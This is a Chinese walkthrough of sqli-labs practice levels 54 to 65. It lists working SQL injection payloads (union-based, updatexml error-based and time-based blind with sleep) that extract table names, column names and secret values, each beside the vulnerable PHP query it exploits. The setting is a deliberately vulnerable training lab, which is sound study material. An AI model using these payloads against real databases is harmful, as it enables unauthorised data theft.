第五十四关

题目给出了数据库名为challenges。

这一关是依旧字符型注入,但是尝试10次后,会强制更换表名等信息。所以尽量在认真思考后进行尝试

爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

爆列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='rnb0t4p7iq'--+

爆数据

?id=-1' union select 1,2,group_concat(id,0x3a,sessid,0x3a,secret_M7ZR,0x3a,tryy) from challenges.rnb0t4p7iq--+

将得到的密码,也就是secret_M7ZR里面的数据进行提交验证。当然表名、列名等信息会不同的。

第五十五关

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

除了单引号变为右括号和本关能尝试14次以外,其他同54关没有区别。

第五十六关

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

同54、55关差不多,只是需要')闭合,当然,也可以尝试14次。

第五十七关

$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

同54关差不多,只是需要双引号闭合。也可以尝试14次。

第五十八关

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

这一关无法使用union联合注入,所以考虑使用报错注入。

爆表名

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

爆列名

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='gshmaxznyj'),0x7e),1)--+

爆数据

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(secret_IWPF) from challenges.gshmaxznyj),0x7e),1)--+

第五十九关

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

相比于58关没有单引号而已。

第六十关

$id = '("'.$id.'")';

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

用")来闭合,其他一样。

第六十一关

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

用'))来闭合,其他一样。

第六十二关

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

union联合注入和报错注入都没法用了。盲注,太灵性了,最多130次机会,可以用延迟注入慢慢试。

payload:

?id=1')and If(left((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1)='q',sleep(6),0)--+

正确就延迟,错误不延迟。

第六十三关

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

单引号闭合。

第六十四关

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

))闭合。

第六十五关

$id = '"'.$id.'"';

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

")闭合。

sqli-labs之Page-4的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...

  9. SQLI LABS Advanced Part(23-37) WriteUp

    继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...

  10. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

随机推荐

  1. [PHP] excel 的导入导出

    其实excel导入导出挺简单的,导出最简单! 其原理都是把数据读出来,导出是从数据库中读出数据,导入是从文件读出数据! 导出写入文件,导入写入数据库! 但是在导入表的时候,用的是PHPExcel, 不 ...

  2. jQuery(*****)

    参考1 参考2 1. jQuery 1. 选择器 $("") 1. 基本选择器 1. ID --> $("#d1") 2. 标签名 --> $(&q ...

  3. php的一个有意思的命令:-S

    php -S localhost:8188 /web 会启动一个监控IP:PORT 的http服务,算是简易的web服务器吧.基本上,实现了PHP+MySQL就可以建立一个简易测试网站的环境.

  4. Go语言: 万物皆异步

    来源:https://www.jianshu.com/p/62c0cd107da3 同步和异步.阻塞和非阻塞 首先要明确的是,同步(Synchronous)和异步(Asynchronous),阻塞(B ...

  5. 【<meta name="" content=">】的作用

    一.语法: <meta name="name" content="string"/> 二.参数解析: 1.name项:常用的选项有keywords( ...

  6. discuz修改禁止性别保密选项

    第一步找到source/function/function_profile.php 第二步  注释下面的代码 else { $html .= '<option value="0&quo ...

  7. .Net平台GC VS JVM垃圾回收

    前言 不知道你平时是否关注程序内存使用情况,我是关注的比较少,正好借着优化本地一个程序的空对比了一下.Net平台垃圾回收和jvm垃圾回收,顺便用dotMemory看了程序运行后的内存快照,生成内存快照 ...

  8. Java第一阶段作业总结

    目录 0.前言 1.作业过程总结 2.OO设计心得 3.测试的理解与实践 4.课程收获 5.对课程的建议 前言 本次博客针对第一阶段的三次作业发表总结,作业要求主要是初学者对于Java的基本语法.用法 ...

  9. (转)如何学好C++语言

    原文:http://coolshell.cn/articles/4119.html   作者:陈皓 昨天写了一篇如何学好C语言,就有人回复问我如何学好C++,所以,我把我个人的一些学习经验写在这里,希 ...

  10. Scala的存在类型

    Scala的存在类型 存在类型也叫existential type,是对类型做抽象的一种方法.可以在你不知道具体类型的情况下,就断言该类型存在. 存在类型用_来表示,你可以把它看成java中的?. 下 ...